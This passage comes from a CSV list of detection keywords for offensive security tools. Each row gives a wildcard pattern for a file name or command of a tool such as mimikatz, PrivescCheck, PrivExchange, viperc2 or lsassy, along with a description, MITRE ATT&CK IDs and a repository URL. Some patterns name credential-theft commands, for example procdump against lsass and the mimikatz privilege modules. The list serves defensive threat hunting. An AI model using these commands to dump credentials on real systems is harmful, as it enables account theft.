TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*privesc-check*","offensive_tool_keyword","windows-privesc-check","privesc script checker - Windows-privesc-check is standalone executable that runs on Windows systems. It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).","T1048 - T1059 - T1088 - T1208","TA0004 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/pentestmonkey/windows-privesc-check","1","1","N/A","N/A","10","1394","336","2023-08-01T07:35:20Z","2015-03-22T13:39:38Z" +"*PrivescCheck.ps1*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*PrivescCheck_*.*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*PrivescCheckAsciiReport*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*PrivEscManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*privexchange.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*privexchange.py*","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"*privexchange.py*","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"*PrivExchange-master.zip*","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"*PrivFu-main.zip*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*PrivFu-master*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*privilege::backup*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::debug*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::debug*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::driver*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::id*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::name*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::restore*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::security*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::sysenv*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::tcb*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*Privileged Accounts - Layers Analysis.txt*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*Privileged Accounts Permissions - Final Report.csv*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*Privileged Accounts Permissions - Irregular Accounts.csv*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*PrivilegeEscalation*","offensive_tool_keyword","PrivilegeEscalation","This program is a very short batch file which allows you to run anything with admin rights without prompting user could be related to other tools using privsec methods","T1548.001 - T1548.003 - T1548.008","TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/LouisVallat/PrivilegeEscalation","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PrivilegeEscalation_BypassUserAccountControl_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PrivilegeEscalation_EnumPatchExample_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PrivilegeEscalation_ExploitationForPrivilegeEscalation_CVE_2021_40449.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PrivilegeEscalation_ExploitationForPrivilegeEscalation_EfsPotato.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PrivilegeEscalation_ExploitationForPrivilegeEscalation_SweetPotato.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PrivilegeEscalation_ExploitationForPrivilegeEscalation_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PrivilegeEscalation_ProcessInjection_Getsystem.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Privileger.cpp*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" +"*Privileger.exe*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" +"*Privileger-main.*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" +"*Privilegerx64.exe*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" +"*Privilegerx86.exe*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" +"*PrivKit32*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*PrivKit-main*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*Probable-Wordlists*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Probable-Wordlists*","offensive_tool_keyword","Probable-Wordlists","real password lists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Exploitation tools","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*procdump* lsass.exe *.dmp*","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","3","263","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" +"*procdump*lsass*","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","N/A","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*procdump.exe*lsass*","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1003.001","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*procdump/dump_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*procdump_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*procdump_embedded*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*procdump_path=*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*process::exports*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::imports*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::resume*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::run*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::runp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::start*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::stop*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation 